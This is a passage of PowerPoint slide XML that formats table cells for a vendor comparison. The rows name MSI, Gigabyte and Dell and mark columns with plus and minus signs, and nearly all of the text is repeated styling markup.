                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="404925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>MSI</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="404925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>Gigabyte</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="404925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>Dell</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
